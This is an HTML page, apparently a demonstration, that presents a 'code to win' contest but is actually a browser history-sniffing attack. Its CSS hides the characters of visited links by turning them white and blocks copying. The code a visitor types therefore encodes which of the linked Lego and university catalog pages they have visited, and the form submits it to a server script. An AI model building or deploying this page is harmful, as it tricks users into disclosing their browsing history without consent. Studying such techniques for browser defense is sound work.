<!DOCTYPE html>

<html>

<body>
Enter the following code to win!

<br/><br/>

<a href="https://www.lego.com/">X</a>
<a href="https://www.stthomas.edu/catalog/current/arth/">L</a>
<a href="https://www.stthomas.edu/catalog/current/chem/">0</a>
<a href="https://www.stthomas.edu/catalog/current/econ/">b</a>
<a href="https://www.stthomas.edu/catalog/current/engl/">T</a>
<a href="https://www.stthomas.edu/catalog/current/math/">6</a>
<a href="https://www.stthomas.edu/catalog/current/physics/">Z</a>
<a href="https://www.lego.com/">P</a>
<a href="https://www.lego.com/">n</a>



<br/><br/>

<form action="historyserver.php" method="get">
Your Code: <input type="text" name="q" style="width: 400px"/>

<style>
a:link {
  color: black;
  background-color: transparent;
  text-decoration: none;
  pointer-events: none;
  user-select: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
}

a:visited {
  color: white;
  background-color: transparent;
  text-decoration: none;
  pointer-events: none;
  user-select: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
}

a:selection {
  background: rgba(0, 0, 0, 0);
  user-select: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;

}

a:hover {
  background-color: transparent;
  text-decoration: none;
  cursor:default;
}
</style>


</body>

</html>
